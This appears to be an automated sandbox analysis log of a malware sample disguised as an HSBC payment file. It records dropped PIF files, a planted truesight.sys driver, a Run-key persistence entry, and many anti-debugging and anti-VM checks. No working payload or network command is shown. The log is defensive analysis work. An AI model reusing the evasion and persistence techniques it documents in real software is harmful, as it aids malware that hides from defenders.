                      Source: Yara match | File source: 0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1704893572.000000000224B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2197880197.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.1642008766.000000007FD90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000001.1938553898.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: uzonfntK.pif.0.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A98798 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02A98798
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A832FC push eax; ret 0_2_02A83338
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02AAC2FC push 02AAC367h; ret 0_2_02AAC35F
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8635A push 02A863B7h; ret 0_2_02A863AF
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8635C push 02A863B7h; ret 0_2_02A863AF
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02AAC0AC push 02AAC125h; ret 0_2_02AAC11D
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02AAC1F8 push 02AAC288h; ret 0_2_02AAC280
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02AAC144 push 02AAC1ECh; ret 0_2_02AAC1E4
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A986B8 push 02A986FAh; ret 0_2_02A986F2
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A86738 push 02A8677Ah; ret 0_2_02A86772
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A86736 push 02A8677Ah; ret 0_2_02A86772
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8C4EC push ecx; mov dword ptr [esp], edx 0_2_02A8C4F1
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9E5AC push ecx; mov dword ptr [esp], edx 0_2_02A9E5B1
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8D520 push 02A8D54Ch; ret 0_2_02A8D544
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8CB6C push 02A8CCF2h; ret 0_2_02A8CCEA
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02AABB64 push 02AABD8Ch; ret 0_2_02AABD84
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8CB5A push 02A8CCF2h; ret 0_2_02A8CCEA
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9788C push 02A97909h; ret 0_2_02A97901
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A968C8 push 02A96973h; ret 0_2_02A9696B
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A968C6 push 02A96973h; ret 0_2_02A9696B
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9890E push 02A98948h; ret 0_2_02A98940
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9A918 push 02A9A950h; ret 0_2_02A9A948
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A98910 push 02A98948h; ret 0_2_02A98940
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A92EE0 push 02A92F56h; ret 0_2_02A92F4E
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A92FEB push 02A93039h; ret 0_2_02A93031
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A92FEC push 02A93039h; ret 0_2_02A93031
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A95DFC push ecx; mov dword ptr [esp], edx 0_2_02A95DFE
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_0040D99D push esp; iretd 3_2_0040D99E
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_00416373 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_00416305 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_004163B1 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_004034E0 push eax; ret 3_2_004034E2

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | File created: C:\Users\Public\Libraries\Ktnfnozu.PIF
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | File created: C:\Users\Public\Libraries\uzonfntK.pif
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ktnfnozu
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02A9A954
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2901096E rdtsc
Source: C:\Users\Public\Libraries\uzonfntK.pif; API coverage: 0.7 %
Source: C:\Users\Public\Libraries\uzonfntK.pif; API coverage: 0.3 %
Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 3332; Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 5844; Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Libraries\uzonfntK.pif TID: 2308; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe; Code function: 0_2_02A858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005E6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWlp.d
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005FC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: Ktnfnozu.PIF, 0000000B.00000002.1964013772.0000000000784000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Ktnfnozu.PIF, 00000005.00000002.1858386766.00000000006DE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe; API call chain: ExitProcess graph end node graph_0-26199
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF; API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\uzonfntK.pif; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe; Code function: 0_2_02A9EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe; Process queried: DebugPort
Source: C:\Users\Public\Libraries\uzonfntK.pif; Process queried: DebugPort
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF; Process queried: DebugPort
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2901096E rdtsc
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_00417B33 LdrLoadDll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe; Code function: 0_2_02A98798 LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2904E908 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905C912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2906892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FFE8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29050946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290A4940 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2901096E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2901096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905C97C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD0887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29074978 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD4859 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290589B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290589B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FE2840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290669C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FF2835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FF2835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290049D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2909A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905E9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290029F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905C810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FDA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2907483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD09AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29000854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29066870 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905E872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905C89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FF6962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290A08C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FC8918 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2909A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290A4B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29098B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD0AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29084B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29078B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29066B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2909AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2907EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD8AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290A2B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FE0A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29084BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FF4A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FFEA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2907EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FFEBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD8BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2905CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FD0BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FF0BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FE0BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2907EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2904CA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FCCB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_290A4A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29008A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29026AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FC8B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29026ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29004AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_28FFEB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_2900AAEE mov eax, dword ptr fs:[00000030h]
